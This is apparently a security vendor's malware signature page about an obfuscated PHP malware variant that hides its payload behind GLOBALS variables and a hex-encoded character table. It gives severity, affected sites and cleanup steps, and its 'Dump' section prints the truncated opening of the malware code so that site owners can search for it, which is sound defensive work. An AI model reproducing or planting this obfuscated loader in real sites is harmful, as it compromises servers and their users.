PRICING SUPPORT LOGIN

PHP malware is one of the most common malicious code found on the internet, mostly because it is the leading server-side language used on websites, followed by ASP, Java, ColdFusion and Perl (source). In order to address this issue, our tools are capable of detecting and cleaning up malware that weren't collected yet, but meet a complex set of characteristics that are considered malicious.
This malware variation uses a set of GLOBALS variables to obfuscate its payload.

Severity

HIGH

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

In order to remove the malicious code from the site, search your files for the strings contained in the dump or unusual code.
It is also recommended that you maintain periodic backups to restore compromised files in case of infection.

Dump

$i5b9c6d = 530;$GLOBALS['u3ad86f']=Array();global$u3ad86f;$u3ad86f=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['pe6aefe0e']="\x5d\x47\x4c\x55\x3a\x62\x58\x2b\x33\x6a\x45\x4b\x61\x35\x7e\x38\x20\x26\x6b\x40\x7a\x63\x42\x4e\x76\x68\x44\x66\x69\x4a\x57\x3e\x51\x7d\x39\xa\x37\x77\x3c\x32\x75\x71\x50\x2a\x9\x28\x67\x21\x41\x36\x23\x53\x3d\x34\x59\x7c\x7b\x29\x5a\x46\x56\x72\x2d\x31\x30\x27\x79\x5e\x24\x25\x78\x65\x64\x70\x60\x52\xd\x74\x6e\x3f\x5c\x4d\x6c\x5f\x6f\x4f\x5b\x2c\x54\x2e\x48\x3b\x2f\x22\x73\x49\x6d\x43";$u3ad86f[$u3ad86f['pe6aefe0e'][61].$u3ad86f['pe6aefe0e'][27].$u3ad86f['pe6aefe0e'][21].$u3ad86f['pe6aefe0e'][49].$u3ad86f['pe6aefe0e'][13].$u3ad86f['pe6aefe0e'][21]]=$u3ad86f['pe6aefe0e'][21].$u3ad86f['pe6aefe0e'][25].$u3ad86f['pe6aefe0e'][61];$u3ad86f[$u3ad86f['pe6aefe0e'][46]...